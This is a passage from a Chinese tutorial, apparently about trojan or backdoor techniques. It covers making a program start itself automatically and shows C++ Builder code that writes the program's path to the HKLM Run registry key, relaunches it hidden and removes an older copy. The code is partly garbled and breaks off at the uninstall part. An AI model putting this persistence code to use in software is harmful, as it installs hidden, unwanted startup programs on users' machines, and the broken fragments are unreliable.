3、程序的自加载运行技术

　　让程序自运行的方法比较多，除了最常见的方法：加载程序到启动组，写程序启动路径到注册表的HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionsRun的方法外，还有很多其他的办法，据yagami讲，还有几十种方法之多，比如可以修改Boot.ini，或者通过注册表里的输入法键值直接挂接启动，通过修改Explorer.exe启动参数等等的方法，真的可以说是防不胜防，下面展示一段通过修改HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionsRun键值来实现自启动的程序：

　　自装载部分：

　　HKEY hkey;

　　AnsiString NewProgramName=AnsiString(sys)+AnsiString("+PName/">\")+PName
[未结束][duba_page]

              unsigned long k;

　　k=REG_OPENED_EXISTING_KEY;

　　RegCreateKeyEx(HKEY_LOCAL_MACHINE,

　　"SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\",

　　0L,

　　NULL,

　　REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS|KEY_SET_VALUE,

　　NULL,

　　&hkey,&k);

　　RegSetValueEx(hkey,

　　"BackGroup",

　　0,

　　REG_SZ,

　　NewProgramName.c_str(),

　　NewProgramName.Length());
　　
　　RegCloseKey(hkey);

　　if (int(ShellExecute(Handle,

　　"open",

　　NewProgramName.c_str(),

　　NULL,

　　NULL,

　　SW_HIDE))>32)

　　{

　　WantClose=true;

　　Close();

　　}

　　else

　　{

　　HKEY hkey;

　　unsigned long k;

　　k=REG_OPENED_EXISTING_KEY;

　　long a=RegCreateKeyEx(HKEY_LOCAL_MACHINE,

　　"SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN",

　　0,

　　NULL,

　　REG_OPTION_NON_VOLATILE,

　　KEY_SET_VALUE,NULL,

　　&hkey,&k);

　　RegSetValueEx(hkey,

　　"BackGroup",

　　0,

　　REG_SZ,

　　ProgramName.c_str(),

　　ProgramName.Length());

　　int num=0;

　　char str[20];

　　DWORD lth=20;

　　DWORD type;

　　char strv[255];

　　DWORD vl=254;

　　DWORD Suc;

　　do{

　　Suc=RegEnumValue(HKEY_LOCAL_MACHINE,

　　(DWORD)num,str,

　　NULL,
　　
　　&type,

　　strv,&vl);

　　if (strcmp(str,"BGroup")==0)

　　{

　　 DeleteFile(AnsiString(strv));

　　RegDeleteValue(HKEY_LOCAL_MACHINE,"BGroup");

　　 break;

　　}

　　}while(Suc== ERROR_SUCCESS);

　　RegCloseKey(hkey);

　　}

　　自装载程序的卸载代码：

　　int num;

　　char str2[20];

　　DWORD lth=20;

　　DWORD type;
　　
　　char strv[255];
[未结束][duba_page]

上一页  [1] [2] [3] 下一页